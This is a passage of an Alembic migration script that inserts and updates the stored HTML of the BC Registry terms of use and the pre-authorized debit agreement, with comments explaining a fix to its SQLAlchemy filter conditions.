<li><span>(g)</span>use, reproduce or distribute any altered information, including any printout or display of altered information, or represent any altered information as having been retrieved from any Data Base unless explicitly authorized to do so by the Province.</li>
</ul>
</li>
<li><span>7.5</span> The Subscriber will adhere, and will ensure that each of its Team Members adhere, to any applicable security policies, standards or procedures in respect of a particular Data Base that may be provided to the Subscriber and/or its Team Members by the Province from time to time.</li>
</ul>
</section>
<section>
<header>8. Fees</header>
<ul>
<li><span>8.1</span>The Subscriber will pay to the Province all applicable Fees for the Services.</li>
<li><span>8.2</span>Subject to section 8.5, all Fees are due and payable when a Transaction is processed.</li>
<li><span>8.3</span>If a Premium Account Subcriber opts to pay Fees through a Deposit Account, the Fees payable for Transactions will be charged to the applicable Deposit Account and in accordance with the BC Online Terms and Conditions found at <a href="https://www.bconline.gov.bc.ca/terms_conditions.html" target="_blank">(https://www.bconline.gov.bc.ca/terms_conditions.html)</a> (the “BC Online Terms”).</li>
<li><span>8.4</span>If a Premium Account Subscriber opts to pay Fees through pre-authorized debit, the Fees payable for Transactions will be paid according to the PAD Agreement found at <a href="./PAD-terms-and-conditions" target="_blank">(https://www.bcregistry.ca/business/auth/PAD-terms-and-conditions)</a> (the Business Pre-Authorized Debit Terms and Conditions Agreement).</li>
<li><span>8.5</span>Fees payable for Transactions processed by Basic Account Subscribers will be payable by credit card or online banking before the Transaction is processed.</li>
<li><span>8.6</span>Unless otherwise specified in this Agreement, all references to money in respect of the Services are to Canadian dollars and all Fees will be processed in Canadian dollars.</li>
<li><span>8.7</span>The Province may charge the Subscriber a service fee of thirty dollars ($30.00) if any method of payment of any Fees is rejected by the Subscriber’s financial institution for any failed payment, and may suspend Access until such service fee and all other Fees owing have been paid by the Subscriber.</li>
<li><span>8.8</span>Unless otherwise specified in any Additional Terms, any refund or credit for any Transactions or other Services is at the sole discretion of the Province.</li>
<li><span>8.9</span>The Province, by electronic or other means, will provide to the Premium Subscriber, at regular intervals to be determined by the Subscriber from options provided to the Subscriber by the Province, a statement that contains: (a) an itemized list of Transactions and (b) the total Fees for those Transactions.</li>
<li><span>8.10</span>If a Subcriber has a BC Online account and wishes to receive a statement containing consolidated accounting of Transactions made in BC Online and the new BC Registry System, the Subscriber must link both accounts.</li>
<li><span>8.11</span>Unless otherwise specified in any Additional Terms, if a Subscriber does not notify the Province in writing of any errors in or objections to any Fees identified in the Statement within ninety (90) days of the date of the applicable invoice, the Fees set out in the invoice will be conclusively deemed to have been accepted as correct by the Subscriber and no claim for adjustment or set-off will be accepted.</li>
</ul>
</section>
<section>
<header>9. Relationship</header>
<ul>
<li><span>9.1</span>This Agreement will not in any way make the Subscriber or any Team Member an employee, agent or independent contractor of the Province and the Subscriber will not, and will ensure that its Team Members do not, in any way indicate or hold out to any person that the Subscriber or any Team Member is an employee, agent or independent contractor of the Province.</li>
</ul>
</section>
<section>
<header>10. Suspension of Service</header>
<ul>
<li><span>10.1</span>The Province may, in its sole discretion, immediately suspend Access upon notice to the Subscriber in accordance with section 13 if:</li>
<li>
<ul>
<li><span>(a)</span>the Subscriber or any of its Team Members has, in the reasonable opinion of the Province, in any way jeopardized the integrity or security of the Service;</li>
<li><span>(b)</span>the Subscriber fails to pay Fees in accordance with section 8.2 or 8.5, as applicable; or</li>
<li><span>(c)</span>the Subscriber or any of its Team Members has violated any other provision of this Agreement.</li>
</ul>
</li>
</ul>
</section>
<section>
<header>11. Termination</header>
<ul>
<li><span>11.1</span>The term of this Agreement will be from the Commencement Date and will continue until terminated in accordance with the provisions of this Agreement.</li>
<li><span>11.2</span>The Province may immediately terminate this Agreement upon written notice to the Subscriber if the Subscriber’s Access has been suspended pursuant to Article 10.1.</li>
<li><span>11.3</span>This Agreement may be terminated by either party for any reason upon providing sixty (60) days written notice to the other party.</li>
<li><span>11.4</span>Upon termination:</li>
<li>
<ul>
<li><span>(a)</span>the Subscriber will immediately cease, and will ensure that all of its Team Members immediately cease, all use on the Subscriber’s behalf of the Service and all Passcodes; and</li>
<li><span>(b)</span>Premium Account Subscribers will pay to the Province all unpaid Fees incurred by the Subscriber up to the date of termination.</li>
</ul>
</li>
<li><span>11.5</span>In the event that a Subscriber’s Agreement is terminated, the Province reserves the right to refuse future Access to that Subscriber or to downgrade a Premium Account Subscriber to a Basic Account Subscriber, in which case the Subscriber acknowledges and agrees that it is only entitled to Access up to ten Transactions per month.</li>
</ul>
</section>
<section>
<header>12. Warranty Disclaimer, Limitation of Liability and Indemnity</header>
<ul>
<li><span>12.1</span>THE SUBSCRIBER ACKNOWLEDGES AND CONFIRMS THAT THE SUBSCRIBER UNDERSTANDS THAT THIS ARTICLE 12 REQUIRES THE SUBSCRIBER TO ASSUME THE FULL RISK IN RESPECT OF ANY USE OF THE SERVICES BY THE SUBSCRIBER AND/OR ITS TEAM MEMBERS.</li>
<li><span>12.2</span>Except as expressly set out in this Agreement, and in addition to the Province’s general Warranty Disclaimer and Limitation of Liabilities, the Province assumes no responsibility or liability to any person using the Service or any Content. In particular, without limiting the general nature of the foregoing:</li>
<li>
<ul>
<li><span>(a)</span>in no event will the Province, its respective servants, agents, contractors or employees be liable for any direct, indirect, special or consequential damages or other loss, claim or injury, whether foreseeable or unforeseeable (including without limitation claims for damages for personal injury, lost profits, lost savings or business opportunities) arising out of or in any way connected with the use of, or inability to use the Service or any Content;</li>
<li><span>(b)</span>the entire risk as to the quality and performance of the Service or any Content is assumed by the Subscriber;</li>
<li><span>(c)</span>the Service and all Content are provided “as is”, and the Province disclaims all representations, warranties, conditions, obligations and liabilities of any kind, whether express or implied, in relation to the Service or any Content, including without limitation implied warranties with respect to merchantability, fitness for a particular purpose, error-free or uninterrupted use and non-infringement; and</li>
<li><span>(d)</span>in no event will the Province, its respective servants, agents, contractors or employees be liable for any loss or damage in connection with the Service or any Content, including without limitation any loss or damage caused by any alteration of the format or content of a print copy or electronic display of any information retrieved from the Service, the quality of any print display, the information contained in any screen dump, any system failure, hardware malfunction, manipulation of data, inadequate or faulty Transaction and/or Service, or delay or failure to provide Access to any Team Member or any person using a Team Member's Incorporation Numbers or Passcodes or using any information provided by a Subscriber or any Team Member from the Service.</li>
</ul>
<li><span>12.3</span>The Subscriber must indemnify and save harmless the Province and its respective servants, agents, contractor and employees from any losses, claims, damages, actions, causes of action, costs and expenses that the Province or any of its respective servants, agents, contractors or employees may sustain, incur, suffer or be put to at any time, either before or after this Agreement ends, including any claim of infringement of third-party intellectual property rights, where the same or any of them are based upon, arise out of or occur, directly or indirectly, by reason of any act or omission by the Subscriber, a Team Member or by any of the Subscriber’s other agents, employees, officers or directors in connection with this Agreement.</li>
</ul>
</section>
<section>
<header>13. Notices</header>
<ul>
<li><span>13.1</span>Any written notice either party may be required or may desire to give to the other under this Agreement will be conclusively deemed validly given to or received by the addressee, if delivered personally or by recognized courier service, on the date of such personal delivery, if mailed by prepaid registered mail, on the third business day after the mailing of the same in British Columbia or on the seventh business day if mailed elsewhere, and if delivered by email, on the date received by the recipient:
<li>
<ul>
<li><span>(a)</span>If to the Subscriber, to the address or email address indicated on the Subscriber’s application for the Service, or such other address or email address of which the Subscriber has notified the Province in writing; and</li>
</ul>
</li>
<li>
<ul>
<p><span>(b)</span>If to the Province:<br></p>
<p>
Delivery by mail:
</p>
<p>
BC Online Partnership Office<br>
Ministry of Citizens’ Services<br>
PO Box 9412 Stn Prov Govt<br>
Victoria, BC V8W 9V1
</p>
<p>Delivery by courier or in person:</p>
<p>
BC Online Partnership Office<br>
Ministry of Citizens’ Services<br>
E161 – 4000 Seymour Place<br>
Victoria, BC V8X 4S8
</p>
<p>Delivery by email:</p>
bconline@gov.bc.ca
</ul>
</li>
<li><span>13.2</span>The Subscriber will provide the Province with timely written notice of any change of contact information provided by the Subscriber during the application process for Access, and after the provision of such notice, the updated contact information will be conclusively deemed to be the current contact information for the Subscriber, including the Subscriber’s address or email address for the purposes of this Article 13.</li>
<li><span>13.1</span>The Province may, from time to time, advise the Subscriber by notice in writing of any change of address of the Province and from and after the giving of such notice the address specified in the notice will, for the purposes of this Article 13, be conclusively deemed to be the address or email address of the Province.</li>
<li><span>13.3</span>In the event of a disruption of postal services, all mailed notices will be deemed validly given and received when actually received by the addressee.</li>
</ul>
</section>
<section>
<header>14. General</header>
<ul>
<li><span>14.1</span>In this Agreement,</li>
<li>
<ul>
<li><span>(a)</span>unless the context otherwise requires, references to section or Articles by number are to sections or Articles of the body of the Agreement;</li>
<li><span>(b)</span>unless otherwise specified, a reference to a statute by name means the statute of British Columbia by that name, as amended or replaced from time to time;</li>
<li><span>(c)</span>"person" includes an individual, partnership, corporation or legal entity of any nature; and</li>
<li><span>(d)</span>unless the context otherwise requires, words expressed in the singular includes the plural and vice versa.</li>
</ul>
</li>
<li><span>14.2</span>The Schedules to this Agreement are a part of this Agreement.</li>
<li><span>14.3</span>In the event of any conflict or inconsistency between a term in the body of this Agreement and a term in a Schedule, the term in the Schedule will prevail.</li>
<li><span>14.4</span>The Subscriber will not, without the prior written consent of the Province, assign, either directly or indirectly, this Agreement or any right of the Subscriber under this Agreement.</li>
<li><span>14.5</span>This Agreement will be for the benefit of and be binding upon the successors and permitted assigns of each of the parties.</li>
<li><span>14.6</span>This Agreement (including any terms incorporated by reference herein) is the entire agreement between the Subscriber and the Province with respect to the subject matter of this Agreement, and supercedes and replaces any prior and/or written agreements.</li>
<li><span>14.7</span>The headings in this Agreement are inserted for convenience only, and will not be used in interpreting or construing any provision of this Agreement.</li>
<li><span>14.8</span>All provisions in this Agreement in favour of either party and all rights and remedies of either party, either at law or in equity, will survive the expiration or sooner termination of this Agreement.</li>
<li><span>14.9</span>If any provision of this Agreement is invalid, illegal or unenforceable, that provision will be severed from this Agreement and all other provisions will remain in full force and effect.</li>
<li><span>14.10</span>This Agreement will be governed by and construed in accordance with the laws of British Columbia and the laws of Canada applicable therein. By using the Service, the Subscriber consents to the exclusive jurisdiction and venue of the courts of the province of British Columbia for the hearing of any dispute arising from or related to this Agreement and/or the Subscriber’s use of the Service.</li>
</ul>
</section>
"""
# Insert the version-4 terms-of-use document (HTML payload built above).
tos_v4_row = {
    'version_id': '4',
    'type': 'termsofuse',
    'content': html_content,
    'content_type': 'text/html',
}
op.bulk_insert(documents, [tos_v4_row])
# update terms of use version 3 content
tos_version3_content = """
<section>
<p>The parties to this “BC Registry Terms and Conditions of Agreement” (the “Agreement”) are Her Majesty the Queen in Right of the Province of British Columbia, as represented by the Minister of Citizens’ Services (the “Province”) and the Subscriber (as defined below).</p>
</section>
<section>
<header>1. DEFINITIONS</header>
<ul>
<li><span>a.</span><strong>"Access"</strong> means the non-exclusive right to electronically access and use the Service;</li>
<li><span>b.</span><strong>"Basic Account Subscriber"</strong> means a Subscriber with Access for up to ten Transactions per month that pays Fees for Transactions using a credit card;</li>
<li><span>c.</span><strong>"BCeID Information"</strong> means a BCeID account user ID or password, which authenticates the identity of the Subscriber or a User, as the case may be, to the Service if the Subscriber or a User uses a BCeID for this purpose;</li>
<li><span>d.</span><strong>"BC Online Terms and Conditions"</strong> means the BC Online Terms and Conditions of Agreement found at <a href="https://www.bconline.gov.bc.ca/terms_conditions.html">https://www.bconline.gov.bc.ca/terms_conditions.html;</a></li>
<li><span>e.</span><strong>"Content"</strong> means the Service’s Data Base, and all associated information and documentation, including any print copy or electronic display of any information retrieved from the Data Base and associated with the Service;</li>
<li><span>f.</span><strong>"Data Base"</strong> means any data base or information stored in electronic format for which Access is made available through the Service;</li>
<li><span>g.</span><strong>"Deposit Account"</strong> has the meaning given to it in the BC Online Terms and Conditions;</li>
<li><span>h.</span><strong>"Entity"</strong> means any legal entity (including a registered society, business, or co-operative) for which a User has Access through the Service;</li>
<li><span>i.</span><strong>"Fees"</strong> means all fees and charges for the Service, as described in the Business Corporations Act - Schedule (Section 431) Fees, Cooperative Association Act - Cooperative Association Regulation, Schedule A;</li>
<li><span>j.</span><strong>"Incorporation Number"</strong> means the unique numerical identifier for a Subscriber’s Entity, and when entered in conjunction with the Passcode, permits a User to perform transactions with regard to that Entity;</li>
<li><span>k.</span><strong>"Passcode"</strong> means the unique identifier issued by the Province to a Subscriber with regard to existing Entities on the Service, which enables a User to have Access with regard to those Entities;</li>
<li><span>l.</span><strong>"Premium Account Subscriber"</strong> means a Subscriber with Access to unlimited Transactions that has a Deposit Account with the Province and is charged Fees in accordance with the BC Online Terms and Conditions;</li>
<li><span>m.</span><strong>"Service"</strong> means the service operated by the Province that allows a Subscriber to complete Transactions relating to BC Entities or other information accessible through the Website;</li>
<li><span>n.</span><strong>"Services Card Number"</strong> means the Subscriber’s BC Services Card number, which authenticates the identity of the Subscriber, or a User, as the case may be, to the Service if the Subscriber or a User uses a BC Services Card for this purpose;</li>
<li><span>o.</span><strong>"Subscriber"</strong> means a person that accesses the Service and that has accepted the terms of this Agreement, and includes Premium Account Subscribers and Basic Account Subscribers;</li>
<li><span>p.</span><strong>"Transaction"</strong> means any action performed by the Subscriber or any of its Users to the Service to display, print, transfer, or obtain a copy of information contained on the Service, or where permitted by the Province, to add to or delete information from the Service;</li>
<li><span>q.</span><strong>"User"</strong> means an individual that is granted Access on the individual’s behalf, if the individual is also the Subscriber, or on behalf of the Subscriber, if the individual is an employee or is otherwise authorized to act on behalf of the Subscriber, as applicable;</li>
<li><span>r.</span><strong>"Website"</strong> means the BC Cooperatives Website at bcregistry.ca/cooperatives and includes all web pages and associated materials, with the exception of the Content.</li>
</ul>
</section>
<section>
<header>2. ACCEPTANCE OF AGREEMENT</header>
<ul>
<li><span>2.1</span>The Subscriber acknowledges that a duly authorized representative of the Subscriber has accepted the terms of this Agreement on behalf of the Subscriber and its Users.</li>
<li><span>2.2</span>The Subscriber acknowledges and agrees that:</li>
<li>
<ul>
<li><span>(a)</span>by creating a profile and/or by clicking the button acknowledging acceptance of this Agreement, each User using the Services on behalf of the Subscriber also accepts, and will be conclusively deemed to have accepted, the terms of this Agreement as they pertain to the User’s use of the Services; and</li>
<li><span>(b)</span>the Subscriber will be solely responsible for its Users’ use of the Services, including without limitation any Fees incurred by its Users in connection with such Services.</li>
</ul>
</li>
<li><span>2.3</span>The Subscriber acknowledges that the terms of the BC Services Card Login Service found at (<a href="https://www2.gov.bc.ca/gov/content/governments/government-id/bc-services-card/terms-of-use" target="_blank">https://www2.gov.bc.ca/gov/content/governments/government-id/bc-services-card/terms-of-use</a>) continue to apply in respect of use of the Services Card by either the Subscriber or a User.</li>
<li><span>2.4</span>Premium Account Subscribers acknowledge that in addition to this Agreement, the terms of the BC Online Terms and Conditions will continue to apply in respect of the use of the Subscriber’s Deposit Account for payment of Fees for the Service.</li>
<li><span>2.5</span>The Subscriber acknowledges that the BCeID terms found at (<a href="https://www.bceid.ca/aboutbceid/agreements.aspx" target="_blank">https://www.bceid.ca/aboutbceid/agreements.aspx</a>) and applicable to the type of BCeID held by the Subscriber or a User, as the case may be, continue to apply in respect of use of the Subscriber or User’s BCeID.</li>
<li><span>2.6</span>The Subscriber will ensure that each of its Users are aware of and comply with the terms of this Agreement as they pertain to the User’s use of the Services.</li>
<li><span>2.7</span>The Province reserves the right to make changes to the terms of this Agreement at any time without direct notice to either the Subscriber or its Users, as applicable. The Subscriber acknowledges and agrees that it is the sole responsibility of the Subscriber to review, and, as applicable, to ensure that its Users review, the terms of this Agreement on a regular basis.</li>
<li><span>2.8</span>Following the date of any such changes, the Subscriber will be conclusively deemed to have accepted any such changes on its own behalf and on behalf of its Users, as applicable. The Subscriber acknowledges and agrees that each of its Users must also accept any such changes as they pertain to the User’s use of the Services.</li>
</ul>
</section>
<section>
<header>3. PROPRIETARY RIGHTS</header>
<ul>
<li><span>3.1</span>The Website and the Content is owned by the Province and/or its licensors and is protected by copyright, trademark and other laws. Except as expressly permitted in this Agreement, the Subscriber may not use, reproduce, modify or distribute, or allow any other person to use, reproduce, modify or distribute, any part of the Website in any form whatsoever without the prior written consent of the Province.</li>
</ul>
</section>
<section>
<header>4. SERVICES</header>
<ul>
<li><span>4.1</span>The Province will provide the Subscriber and its Users with Access on the terms and conditions set out in this Agreement.</li>
<li><span>4.2</span>Subject to section 4.3, Access will be available during the hours published on the Website, as may be determined by the Province in its sole discretion from time to time.</li>
<li><span>4.3</span>The Province reserves the right to limit or withdraw Access at any time in order to perform maintenance of the Service or in the event that the integrity or security of the Service is compromised.</li>
<li><span>4.4</span>The Province further reserves the right to discontinue the Service at any time.</li>
<li><span>4.5</span>The Province will provide helpdesk support to assist Users with Access during the hours published on the Website, as may be determined by the Province in its sole discretion from time to time.</li>
<li><span>4.6</span>The Subscriber acknowledges and agrees that, for the purpose of Access:</li>
<li>
<ul>
<li><span>(a)</span>it is the Subscriber’s sole responsibility, at the Subscriber’s own expense, to provide, operate and maintain computer hardware and communications software or web browser software that is compatible with the Services; and</li>
<li><span>(b)</span>that any failure to do so may impact the Subscriber’s and/or User’s ability to access the Service.</li>
</ul>
</li>
</ul>
</section>
<section>
<header>5. SUBSCRIBER OBLIGATIONS</header>
<ul>
<li><span>5.1</span> The Subscriber will comply, and will ensure that all of its Users comply, with:</li>
<li>
<ul>
<li><span>(a)</span>the requirements regarding the integrity and/or security of the Service set out in this Article 4; and</li>
<li><span>(b)</span>all applicable laws,</li>
</ul>
</li>
<li>in connection with the Subscriber’s and/or Users’ use of the Services. </li>
<li><span>5.2</span> The Subscriber will ensure that each User:</li>
<li>
<ul>
<li><span>(a)</span>is duly authorized by the Subscriber to perform any Transaction and utilize the Service on behalf of the Subscriber;</li>
<li><span>(b)</span>maintains in confidence Services Card Numbers, BCeID Information, Incorporation Numbers and Passcodes;</li>
<li><span>(c)</span>is competent to perform a Transaction and utilize the Service; </li>
<li><span>(d)</span>has been adequately trained and instructed to perform a Transaction and utilize the Service; and</li>
<li><span>(e)</span>does not use the Service for any inappropriate or unlawful purpose.</li>
</ul>
</li>
</ul>
</section>
<section>
<header>6. FEES</header>
<ul>
<li><span>6.1</span>The Subscriber will pay to the Province all applicable Fees for the Services.</li>
<li><span>6.2</span>Fees payable for Transactions processed by Premium Account Subscribers will be charged to the applicable Deposit Account and in accordance with the BC Online Terms and Conditions.</li>
<li><span>6.3</span>Fees payable for Transactions processed by Basic Account Subscribers will be payable by credit card before the Transaction is processed.</li>
</ul>
</section>
<section>
<header>7. RELATIONSHIP</header>
<ul>
<li><span>7.1</span>This Agreement will not in any way make the Subscriber or any User an employee, agent or independent contractor of the Province and the Subscriber will not, and will ensure that its Users do not, in any way indicate or hold out to any person that the Subscriber or any User is an employee, agent or independent contractor of the Province.</li>
</ul>
</section>
<section>
<header>8. SUSPENSION OF SERVICE</header>
<ul>
<li><span>8.1 </span> The Province may, in its sole discretion, immediately suspend Access upon written notice to the Subscriber if:</li>
<li>
<ul>
<li><span>(a)</span>the Subscriber or any of its Users has, in the reasonable opinion of the Province, in any way jeopardized the integrity or security of the Service; or</li>
<li><span>(b)</span>the Subscriber or any of its Users has violated any other provision of this Agreement.</li>
</ul>
</li>
</ul>
</section>
<section>
<header>9. TERMINATION</header>
<ul>
<li><span>9.1</span>The Province may immediately terminate this Agreement upon written notice to the Subscriber if the Subscriber’s Access has been suspended pursuant to section 8.1.</li>
<li><span>9.2</span>Upon termination:</li>
<li>
<ul>
<li><span>(a)</span>the Subscriber will immediately cease, and will ensure that all of its Users immediately cease, all use of the Service and all Passcodes; and</li>
<li><span>(b)</span>Premium Account Subscribers will pay to the Province all unpaid Fees incurred by the Subscriber up to the date of termination.</li>
</ul>
</li>
<li><span>9.3</span>In the event that a Subscriber’s Agreement is terminated, the Province reserves the right to refuse future Access to that Subscriber or to downgrade a Premium Account Subscriber to a Basic Account Subscriber, in which case the Subscriber acknowledges and agrees that it is only entitled to Access up to ten Entities and will release any Entities in excess of that number.</li>
</ul>
</section>
<section>
<header>10. WARRANTY DISCLAIMER, LIMITATION OF LIABILITY AND INDEMNITY</header>
<ul>
<li><span>10.1</span>The subscriber acknowledges and confirms that the subscriber understands that this article 10 requires the subscriber to assume the full risk in respect of any use of the services by the subscriber and/or its users.</li>
<li><span>10.2</span>Except as expressly set out in this Agreement, and in addition to the Province’s general Warranty Disclaimer and Limitation of Liabilities, the Province assumes no responsibility or liability to any person using the Service or any Content. In particular, without limiting the general nature of the foregoing:</li>
<li>
<ul>
<li><span>(a)</span>in no event will the Province, its respective servants, agents, contractors or employees be liable for any direct, indirect, special or consequential damages or other loss, claim or injury, whether foreseeable or unforeseeable (including without limitation claims for damages for personal injury, lost profits, lost savings or business opportunities) arising out of or in any way connected with the use of, or inability to use the Service or any Content;</li>
<li><span>(b)</span>the entire risk as to the quality and performance of the Service or any Content, is assumed by the Subscriber;</li>
<li><span>(c)</span>the Service and all Content are provided “as is”, and the Province disclaims all representations, warranties, conditions, obligations and liabilities of any kind, whether express or implied, in relation to the Service or any Content, including without limitation implied warranties with respect to merchantability, fitness for a particular purpose, error-free or uninterrupted use and non-infringement; and</li>
<li><span>(d)</span>in no event will the Province, its respective servants, agents, contractors or employees be liable for any loss or damage in connection with the Service or any Content, including without limitation any loss or damage caused by any alteration of the format or content of a print copy or electronic display of any information retrieved from the Service, the quality of any print display, the information contained in any screen dump, any system failure, hardware malfunction, manipulation of data, inadequate or faulty Transaction and/or Service, or delay or failure to provide Access to any User or any person using a User's Incorporation Numbers or Passcodes or using any information provided by a Subscriber or any User from the Service.</li>
</ul>
</li>
<li><span>10.3</span>The Subscriber must indemnify and save harmless the Province and its respective servants, agents, contractor and employees from any losses, claims, damages, actions, causes of action, costs and expenses that the Province or any of its respective servants, agents, contractors or employees may sustain, incur, suffer or be put to at any time, either before or after this Agreement ends, including any claim of infringement of third-party intellectual property rights, where the same or any of them are based upon, arise out of or occur, directly or indirectly, by reason of any act or omission by the Subscriber or by any of the Subscriber’s agents, employees, officers or directors in connection with this Agreement.</li>
</ul>
</section>
<section>
<header>11. GENERAL</header>
<ul>
<li><span>11.1</span>In this Agreement,</li>
<li>
<ul>
<li><span>(a)</span>unless the context otherwise requires, references to sections by number are to sections of the Agreement;</li>
<li><span>(b)</span>unless otherwise specified, a reference to a statute by name means the statute of British Columbia by that name, as amended or replaced from time to time;</li>
<li><span>(c)</span>“person” includes an individual, partnership, corporation or legal entity of any nature; and</li>
<li><span>(d)</span>unless the context otherwise requires, words expressed in the singular includes the plural and vice versa.</li>
</ul>
</li>
<li><span>11.2</span>This Agreement is the entire agreement between the Subscriber and the Province with respect to the subject matter of this Agreement, and supercedes and replaces any prior and/or written agreements.</li>
<li><span>11.3</span>The headings in this Agreement are inserted for convenience only, and will not be used in interpreting or construing any provision of this Agreement</li>
<li><span>11.4</span>All provisions in this Agreement in favour of either party and all rights and remedies of either party, either at law or in equity, will survive the expiration or sooner termination of this Agreement.</li>
<li><span>11.5</span>If any provision of this Agreement is invalid, illegal or unenforceable, that provision will be severed from this Agreement and all other provisions will remain in full force and effect.</li>
<li><span>11.6</span>This Agreement will be governed by and construed in accordance with the laws of British Columbia and the laws of Canada applicable therein. By using the Service, the Subscriber consents to the exclusive jurisdiction and venue of the courts of the province of British Columbia for the hearing of any dispute arising from or related to this Agreement and/or the Subscriber’s use of the Service.</li>
</ul>
</section>
"""
# Rewrite the stored content of terms-of-use version 3.
# BUG FIX: the original combined the two filters with the Python `and`
# operator. SQLAlchemy cannot overload `and`; truth-testing the first
# comparison yields False, so `A and B` evaluated to `A` alone and the
# `type == 'termsofuse'` filter was silently dropped — the UPDATE matched
# every document row with version_id '3'. Use the overloaded `&` operator
# (SQL AND) with each comparison parenthesized, since `&` binds tighter
# than `==` in Python.
op.execute(
    documents.update()
    .where(
        (documents.c.version_id == op.inline_literal('3'))
        & (documents.c.type == op.inline_literal('termsofuse'))
    )
    .values({'content': op.inline_literal(tos_version3_content)})
)
# update pad terms version p1 content
pad_terms_content = """
<section>
<header>
In this agreement:
</header>
<ul>
<li>
“the biller” refers to “Her Majesty the Queen in Right of the Province of British Columbia as represented by the Minister of Citizen’s Services - BC Registry and Online Services (Prov of BC);
</li>
<li>
“the payor” refers to the Premium Account Subscriber of the BC Registry Service as defined in the BC Registry Terms and Conditions of Agreement (the “BC Registry Terms”); and
</li>
<li>
unless defined herein, capitalized terms in this agreement will have the meaning as set out in BC Registry Terms.
</li>
</ul>
</section>
<section>
<header>
The payor acknowledges or understands:
</header>
<ul>
<li>
<span>1.</span>That this authorization is provided for the benefit of the biller and our financial institution, and is provided in consideration of the Payor’s Financial Institution agreeing to process debits (PADs) against the bank account as indicated in the biller’s PAD application webform and in accordance with the rules of <a href="http://www.payments.ca" target="_blank">Payments Canada</a>.
</li>
<li>
<span>2.</span>Ticking the acceptance box on the biller’s PAD application webform will be considered equivalent to my signature and will constitute valid authorization for the processing financial institution to debit the payor’s account as identified in the biller’s PAD application webform (the “Payor’s Bank Account”).
</li>
<li>
<span>3.</span>This authority will remain in effect until the biller has received written communication from the payor of cancellation or changes relating to the Payor’s Bank Account.
</li>
<li>
<span>4.</span>The payor may cancel this PAD agreement at any time with written notification to the biller. Written notification of changes or cancellation must be received at least 10 business days prior to the next online order or withdrawal. Notification must be in writing and sent either through the biller’s BC Registry website or by mail to the address provided below. A sample cancellation form or more information on my right to cancel a PAD Agreement can be obtained at my financial institution or by visiting <a href="http://www.payments.ca" target="_blank">www.payments.ca</a>.
</li>
<li>
<span>5.</span>That cancellation of this agreement by the payor or the biller:
</li>
<li>
<ul>
<li>
<span>a.</span>will result in the suspension of the payors’ Premium Account Subscriber account Access until the payor takes action to authorize another payment method; and
</li>
<li>
<span>b.</span>does not cancel any amount owed for the Service received prior to cancellation.
</li>
</ul>
</li>
<li>
<span>6.</span>Correspondence regarding this agreement will be sent to the payor at the email address associated with the payor’s Premium Subscriber Account (the “Payor’s Email Address”). The payor agrees that any communication sent by the biller to that email address will be deemed to have been received by the payor and acknowledges that it is the payor’s responsibility to notify the biller as soon as possible of changes to the Payor’s Email Address.
</li>
<li>
<span>7.</span><strong>The biller notification of enrollment or cancellation of this Pre-Authorized Debit Agreement to the Payor is being reduced from 15 calendar days to 3 calendar days in accordance with the H1 rule of Payments Canada. Notification will be delivered electronically to the Payor’s Email Address.</strong>
</li>
<li>
<span>8.</span>The payor has certain recourse rights if any debit does not comply with the terms of this business PAD agreement (for example, the right to receive reimbursement for any PAD that is not authorized or is not consistent with terms and conditions of this PAD Agreement). To obtain a form for reimbursement or for more information on recourse rights, contact your financial institution or visit <a href="http://www.payments.ca" target="_blank">www.payments.ca</a>.
</li>
<li>
<span>9.</span>Any payment dishonoured by the payor’s financial institution may result in a dishonoured banking instrument service fee, as prescribed by the Minister of Finance, being applied to the payor’s Premium Account Subscriber account. The biller is not responsible for any additional service fees charged by your financial institution.
</li>
<li>
<span>10.</span>In the event of a dishonoured payment, the biller reserves the right to suspend the payor’s Access until the payor has taken action to re-activate Access by paying any outstanding Fees and dishonoured banking instrument service fees by credit card.
</li>
<li>
<span>11.</span>Due to a delay in payment processing, the biller may subsequently suspend the payor’s Access after a payor has taken action to re-activate Access if another PAD is dishonoured in the intervening period.
</li>
<li>
<span>12.</span>The amount of the daily (excludes weekends and holidays) withdrawal is variable and dependent on the total daily Transactions charged to the payors’ Premium Account Subscriber’s account by Team Members who are authorized to order BC Registry Services.
</li>
<li>
<span>13.</span><strong>The standard 10 calendar day pre-notification period for the sporadic and variable pre-authorized withdrawals will be reduced to 1-2 business days.</strong>
</li>
<li>
<span>14.</span>The biller will provide PAD pre-notification 1-2 business days prior to the withdrawal date. This notification will confirm the amount and estimated date of the pre-authorized withdrawal, will provide a list of all services ordered & other account adjustments and will be delivered electronically to the Payor’s Email Address.
</li>
<li>
<span>15.</span>Your financial institution is not responsible for verifying whether payment has been issued in accordance with the particulars of this agreement.
</li>
</ul>
</section>
<section>
<header>
<strong>Payor Authorization:</strong>
</header>
<p>
I have read, understood and agree to the terms and conditions of the Business Pre-Authorized Debit Terms and Conditions for BC Registry Services
</p>
<p>
I confirm, I am an authorized representative for the payor and authorized signatory on the account to be debited under this agreement.
</p>
<p>
I authorize the biller to withdraw funds from the bank account as indicated above as per the terms and conditions of this agreement.
</p>
<p>
Dated: Month Day, Year
</p>
</section>
"""
# Rewrite the stored content of pre-authorized-debit terms version p1.
# BUG FIX: as with the version-3 update above in the file's history, the
# Python `and` between two SQLAlchemy comparisons discarded the
# `type == 'termsofuse_pad'` condition (truth-testing the eq expression
# is falsy, so `A and B` returned `A`), leaving the UPDATE keyed on
# version_id alone. Combine the filters with the overloaded `&` operator
# (SQL AND), parenthesizing each comparison for precedence.
op.execute(
    documents.update()
    .where(
        (documents.c.version_id == op.inline_literal('p1'))
        & (documents.c.type == op.inline_literal('termsofuse_pad'))
    )
    .values({'content': op.inline_literal(pad_terms_content)})
)
# ### end Alembic commands ###
def downgrade():
    """Revert the document content changes made by this migration's upgrade.

    Deletes the version-4 terms-of-use row, then restores the version-3
    terms-of-use content and the 'p1' pre-authorized-debit terms content.
    Uses ``op.inline_literal`` so the statements render correctly in
    Alembic offline ("--sql") mode.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.execute("DELETE FROM DOCUMENTS WHERE version_id='4' AND type='termsofuse'")
    tos_version3_content = """
<article>
<p>The parties to this “BC Registry Terms and Conditions of Agreement” (the “Agreement”) are Her Majesty the Queen in Right of the Province of British Columbia, as represented by the Minister of Citizens’ Services (the “Province”) and the Subscriber (as defined below).</p>
<section>
<header><span>1.</span> DEFINITIONS</header>
<div>
<p><span>a.</span> <strong>“Access”</strong> means the non-exclusive right to electronically access and use the Service;</p>
<p><span>b.</span> <strong>“Basic Account Subscriber”</strong> means a Subscriber with Access for up to ten Transactions per month that pays Fees for Transactions using a credit card;</p>
